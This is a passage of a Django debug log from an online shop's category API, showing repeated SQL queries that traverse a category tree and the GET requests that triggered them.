"shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:05:50,887 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:05:50,889 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:05:50] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:05:53,948 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:05:53,954 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:05:53,958 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 4; args=(4,) DEBUG 2019-12-16 07:05:53,961 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:05:53,963 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:05:53,965 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:05:53,971 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [16/Dec/2019 07:05:53] "GET /api/v1/categories/4 HTTP/1.0" 200 952 DEBUG 2019-12-16 07:05:53,973 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:05:53,975 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:05:53,977 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:05:53,980 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:05:53,983 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:05:53,985 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:05:53,987 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:05:53,990 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:05:53,992 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:05:53,995 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:05:53,998 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:05:54,000 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:05:54,002 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:05:54,004 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:05:54,008 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:05:54,010 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:05:54,012 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:05:54,014 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:05:54,016 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:05:54,019 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:05:54,022 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:05:54,024 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:05:54,026 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:05:54,029 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:05:54,032 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:05:54,037 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:05:54,039 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:05:54,041 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:05:54,043 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:05:54,046 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:05:54,050 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:05:54,052 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:05:54,055 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:05:54,057 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:05:54,059 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:05:54,062 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:05:54,064 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:05:54,067 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:05:54,069 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:05:54,072 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:05:54,074 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:05:54] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:06:15,957 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:06:15,969 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:06:15,974 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:06:15,977 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:06:15,984 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:06:15,989 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:06:15,993 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:06:15,998 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:06:16,003 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:06:16,010 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:06:16,014 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:06:16,019 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:06:16,023 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:06:16,028 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:06:16,035 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:06:16,039 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:06:16,043 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:06:16,047 